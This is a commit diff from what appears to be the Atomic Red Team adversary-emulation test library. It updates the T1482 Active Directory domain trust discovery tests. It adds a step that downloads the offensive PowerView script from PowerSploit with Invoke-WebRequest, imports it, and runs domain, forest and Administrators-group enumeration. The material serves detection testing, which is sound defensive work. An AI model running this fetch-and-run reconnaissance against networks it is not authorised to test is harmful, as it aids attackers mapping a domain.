security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-06-25 21:43:43 +00:00
parent b52d11fd82
commit 75ba087820
2 changed files with 55 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+19 -3
View File
@@ -35592,6 +35592,10 @@ discovery:
This technique has been used by the Trickbot malware family.
supported_platforms:
- windows
dependencies:
- description: nltest.exe from RSAT must be present on disk
prereq_command: WHERE nltest.exe >NUL 2>&1
get_prereq_command: echo Sorry RSAT must be installed manually
executor:
command: 'nltest /domain_trusts
@@ -35599,13 +35603,25 @@ discovery:
name: command_prompt
- name: Powershell enumerate domains and forests
auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
description: 'Use powershell to enumerate AD information
'
description: |
Use powershell to enumerate AD information.
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: PowerView PowerShell script must exist on disk
prereq_command: if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit
1}
get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1"
-OutFile "$env:TEMP\PowerView.ps1"
- description: RSAT PowerShell AD admin cmdlets must be installed
prereq_command: if ((Get-Command "Get-ADDomain") -And (Get-Command "Get-ADGroupMember"))
{ exit 0 } else { exit 1 }
get_prereq_command: Write-Host "Sorry RSAT must be installed manually"
executor:
command: |
Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
atomics/T1482/T1482.md
+36 -1
View File
@@ -59,13 +59,26 @@ nltest /domain_trusts
#### Dependencies: Run with `command_prompt`!
##### Description: nltest.exe from RSAT must be present on disk
##### Check Prereq Commands:
```cmd
WHERE nltest.exe >NUL 2>&1
```
##### Get Prereq Commands:
```cmd
echo Sorry RSAT must be installed manually
```
<br/>
<br/>
## Atomic Test #3 - Powershell enumerate domains and forests
Use powershell to enumerate AD information
Use powershell to enumerate AD information.
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
**Supported Platforms:** Windows
@@ -77,6 +90,7 @@ Use powershell to enumerate AD information
```powershell
Import-Module "$env:TEMP\PowerView.ps1"
Get-NetDomainTrust
Get-NetForestTrust
Get-ADDomain
@@ -86,6 +100,27 @@ Get-ADGroupMember Administrators -Recursive
#### Dependencies: Run with `powershell`!
##### Description: PowerView PowerShell script must exist on disk
##### Check Prereq Commands:
```powershell
if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"
```
##### Description: RSAT PowerShell AD admin cmdlets must be installed
##### Check Prereq Commands:
```powershell
if ((Get-Command "Get-ADDomain") -And (Get-Command "Get-ADGroupMember")) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "Sorry RSAT must be installed manually"
```
<br/>